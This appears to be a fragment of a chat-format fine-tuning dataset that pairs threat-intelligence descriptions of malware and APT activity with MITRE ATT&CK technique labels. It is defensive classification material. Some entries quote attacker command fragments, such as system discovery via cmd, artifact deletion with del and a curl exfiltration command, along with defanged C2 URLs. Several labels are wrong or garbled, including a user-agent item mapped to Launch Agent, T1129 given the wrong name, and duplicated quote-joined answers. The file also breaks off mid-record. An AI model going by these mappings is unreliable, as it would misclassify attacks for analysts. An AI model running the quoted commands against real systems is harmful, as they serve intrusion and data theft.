- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE can upload files from the victim's machine to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the “attachedTemplate” technique to load a template from a remote server"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan obfuscates its executable code prior to compilation, rather than packing it like most other ransomware, making it harder for researchers to reverse engineer and analyze the malicious code. It also obscures the links to the necessary API function, and stores hashes to strings rather than the actual strings. Upon installation, the Trojan reviews the directory its executable is started from, and if it spots an attempt to launch it from an ‘incorrect’ directory – such as a potential automated sandbox – it exits. Before encrypting files on a victim device, SynAck checks the hashes of all running processes and services against its own hard coded list. If it finds a match, it tries to kill the process"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "tools attempt to spoof anti-virus processes as a means of self-defense."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 used SQL scripts to help perform tasks on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bazar Loader malware was using a code signing certificate signed by Digicert under the organization NOSOV SP Z O O"
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If you use /p, del displays the name of a file and sends the following message: FileName, Delete (Y/N)? To confirm the deletion, press Y. To cancel the deletion and display the next file name (that is, if you specified a group of files), press N. For example, the following command deletes all of the files in the \\Work folder: Copy del \\work - You can use wildcards (* and ?) to delete more than one file at a time. However, to avoid deleting files unintentionally, you should use wildcards cautiously with the del command. For example, if you type the following command: Copy del *.* The del command displays the following prompt: Are you sure (Y/N)? To delete all of the files in the current directory, press Y and then press ENTER. To cancel the deletion, press N and then press ENTER"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates Registry keys to allow itself to run as various services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Computer name - System info using: cmd /c systeminfo >%temp%\\temp.ini - List of currently running process using: cmd /c tasklist >%temp%\\temp.ini"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used malicious PowerShell scripts to enable execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can stop its execution when it recognizes the presence of certain monitoring tools."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth exfiltrates collected information from its r1.log file to the external C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands such as \"net use\" and \"net session\" can be used in Net to gather information about network connections from a particular host."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects a list of files and directories in C:\\ with the command \"dir /s /a c:\\ >> \"C:\\windows\\TEMP\\[RANDOM].tmp\"\"."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the bot is running as admin on Windows XP or 7, persistence is established using application shimming [1]. It uses a method very similar to the one described by FireEye in their blog post “To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence” [3]. A shim database (SDB) is created (Figure 13) to patch services[.]exe with the loader code and then installed with sdbinst[.]exe"
- },
- {
- "role": "assistant",
- "content": "T1546.011 - Event Triggered Execution: Application Shimming"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has renamed rar.exe to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can decompress scripts received from C2."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can communicate over FTP."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DLL file and non-malicious decoy file are encrypted with RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TG-3390 actors have deployed the OwaAuth web shell to Exchange servers, disguising it as an ISAPI filter"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can use the command \"cmd.exe /c del\" to delete its artifacts from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can erase file references to payloads in-memory after being reflectively loaded and executed."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "\"beacon\" payload is capable of capturing screen shots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe also delivers malicious archives containing CrimsonRAT executables using various themes, including honeytraps. Conclusion . Transparent Tribe relies heavily on the use of maldocs to spread their Windows implants. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown has gained execution through victims opening malicious files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "variants can add malicious DLL modules as new services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. It takes no action if the adjustment of the token privileges fails. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. Running in RAM Cobalt Strike modules aren't stored in the file system; their executable code can only be found in RAM. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Connect to another computer using PsExec.exe (the remote access program is included in the Microsoft SysInternals suite), copy the module, and run it; delete the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYSCON has the ability to use Systeminfo to identify system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can update its configuration to use a different C2 server."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used FTP to download additional malware to the target machine."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write it to this registry key in the following format: _ To obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the following URL: hxxps://www.rdppath[.]com/ If the above request using HTTPS does not result in an HTTP 200 OK message or the response data has no alphanumeric characters, the code will attempt to communicate with the C2 server using HTTP via the following URL: hxxp://www.rdppath[.]com/ The code to communicate with the C2 via HTTP exists within an exception handler"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to create a remote shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS can set the AutoRun Registry key with a PowerShell command."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes collects its process identifier (PID) on the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can gather victim proxy information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can discover and collect victim system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors named one instance of their web shell 'outlookconfiguration.aspx' likely for the purpose of appearing to be a legitimate webpage on a targeted OWA server."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can steal system information."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 downloads and executes PowerShell scripts and performs PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Registry subkey that registers a new system device."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The group delivers a malicious Office lure document to victims, most likely via a spear-phishing email. 2) These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains functionality to collect information from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malware sample performs reflective DLL injection."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "http://www.cankayasrc[.]com/style/js/main.php http://ektamservis[.]com/includes/main.php http://gtme[.]ae/font-awesome/css/main.php Recommendations for organizations Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use `LoadLibrary` to attempt to execute GdiPlus.dll."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has collected emails from victim Microsoft Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using a custom User Agent string or the system's User Agent string derived from urlmon.dll 7"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy adds itself to the startup folder or adds itself to the Registry key \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the VBScript in XSL has been run, console commands launched by the JS code continue to be executed. Three files are copied into the folder OFFICE12 that was created in the user profile. Those files are"
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT has encoded data into a binary blob using XOR."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout can call \"window.location.pathname\" to ensure that embedded files are being executed from the C: drive, and will terminate if they are not."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a keylogger and steals clipboard contents from victims."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can use TLS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IceApple Result Retriever module can AES encrypt C2 responses."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Affiliates have been seen brute forcing exposed RDP services and compromising accounts with weak passwords."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can run a copy of cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore uses the \"curl -s -L -o\" command to exfiltrate archived data to a URL."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
